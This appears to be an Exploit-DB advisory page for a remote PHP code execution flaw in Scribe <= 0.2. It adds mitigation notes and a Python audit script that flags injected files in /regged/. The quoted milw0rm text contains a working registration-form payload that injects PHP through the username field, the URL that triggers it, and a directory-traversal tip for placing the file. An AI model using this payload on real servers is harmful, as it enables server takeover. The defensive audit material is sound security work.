Vendor: Scribe
By: KiNgOfThEwOrLd
CVSS: 7.5 (HIGH)
Remote PHP Code Execution
CWE: 79
Product Name: Scribe
Affected Version From:
Affected Version To: 0.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Scribe <= 0.2 Remote PHP Code Execution

When a new user registers in Scribe <= 0.2, a file named after the username is created in the /regged/ directory, and the file's contents include the username. Because the username is written unsanitized into a file that the web server serves as PHP, an attacker can inject PHP code through the username field during registration; that code is executed on the target server when the generated file is requested.

Mitigation:

Upgrade to a newer version of Scribe that fixes this vulnerability. Remove any files generated from potentially malicious usernames from the /regged/ directory.
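The mitigation above asks an administrator to find and remove files in /regged/ that were produced from hostile usernames. The following audit helper is an added example written for this page, not Scribe's own code. It assumes, as the advisory states, that each registration writes regged/[username].php whose body reads "Username: [username]"; the allowlist policy, the marker strings and the sample files it builds are constructed here. It flags file names or bodies that carry a PHP open tag or a <script> tag, flags names that contain traversal components (the raw advisory below notes that traversal sequences in the username relocate the file), and exposes the strict username check that the registration handler should have applied in the first place.

```python
"""Audit helpers for the Scribe <= 0.2 username-to-file issue.

Added example, not Scribe's own code. Assumes, per the advisory, that each
registration writes regged/<username>.php containing "Username: <username>".
The allowlist policy, marker strings and sample files below are constructed.
"""
import os
import re
import tempfile

# Allowlist: letters, digits, underscore, hyphen; 3-32 characters. Nothing in
# this set can form a PHP open tag, a <script> tag, a path separator or "..".
USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{3,32}$")

# Markers that indicate injected code or traversal in a name or file body.
# "<script language=php>" is the form the advisory shows; "<?" covers the
# standard "<?php" and short open tags. "..", "/" and "\" are traversal parts.
CODE_MARKERS = ("<?", "<script")
TRAVERSAL_MARKERS = ("..", "/", "\\")


def is_safe_username(name: str) -> bool:
    """Return True only if the name matches the strict allowlist."""
    return bool(USERNAME_RE.fullmatch(name))


def classify_filename(filename: str) -> list[str]:
    """Reasons a regged/ filename looks injected; an empty list means clean."""
    stem = filename[:-4] if filename.lower().endswith(".php") else filename
    reasons = []
    if any(m in stem.lower() for m in CODE_MARKERS):
        reasons.append("code-marker-in-name")
    if any(m in stem for m in TRAVERSAL_MARKERS):
        reasons.append("traversal-in-name")
    # Anything that passed the two specific checks but still fails the
    # allowlist is reported, so odd names get a human look as well.
    if not reasons and not is_safe_username(stem):
        reasons.append("outside-allowlist")
    return reasons


def classify_contents(data: bytes) -> list[str]:
    """Flag file bodies that contain a PHP open tag or a script tag."""
    text = data.decode("utf-8", errors="replace").lower()
    return ["code-marker-in-body"] if any(m in text for m in CODE_MARKERS) else []


def audit_regged_dir(path: str) -> dict[str, list[str]]:
    """Map each suspicious file directly under `path` to its flag reasons.

    os.listdir does not recurse, so a file relocated through traversal is not
    visible here; run classify_filename over the registration records for that.
    """
    findings = {}
    for entry in sorted(os.listdir(path)):
        full = os.path.join(path, entry)
        if not os.path.isfile(full):
            continue
        reasons = classify_filename(entry)
        with open(full, "rb") as fh:
            reasons += classify_contents(fh.read())
        if reasons:
            findings[entry] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed regged/ directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        # Clean registration: plain username, plain body.
        with open(os.path.join(tmp, "alice.php"), "w") as fh:
            fh.write("Username: alice\n")
        # Tampered registration: the body carries an open tag (constructed).
        with open(os.path.join(tmp, "bob.php"), "w") as fh:
            fh.write("Username: <?php echo 'x'; ?>\n")
        return audit_regged_dir(tmp)


if __name__ == "__main__":
    for name, why in demo().items():
        print(f"{name}: {', '.join(why)}")
```

Run it against a copy of the real /regged/ directory by calling audit_regged_dir with that path; every flagged file should be reviewed and deleted, and is_safe_username is the shape of check a patched registration handler would apply before ever writing to disk.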

Exploit-DB raw data:

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

	Scribe <= 0.2 Remote PHP Code Execution
   Download: http://sourceforge.net/projects/scribe/

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC:

When we register a new user, Scribe makes a file called [username].php located 
in /regged/. The file contains:

Username: [username]
---------------------------------------------------------------
Exploit:

<form id="Register" action="http://[target]/[scribe_path]/forum.php?act=7" 
method="post">
<input maxlength="99999999999" name="username" type="text" value="<script 
language=php>[YOUR_PHP_CODE]"><br>
<input maxlength="32" name="password" type="password" value="kingolo"><br>
<input maxlength="32" name="cpassword" type="password" value="kingolo"><br>
<input maxlength="50" name="email" type="text" value="kingolo"><br>
<input name="confirm" value="Make Shell!" type="submit">
</form>

Now, go on:

http://[target]/[scribe_path]/regged/<script language=php>[YOUR_PHP_CODE].php

And your code will be executed on the target server!
---------------------------------------------------------------
Trick:

If you insert a directory traversal variable in your username, you can save the 
file where you want  ;) 
---------------------------------------------------------------

# milw0rm.com [2007-11-02]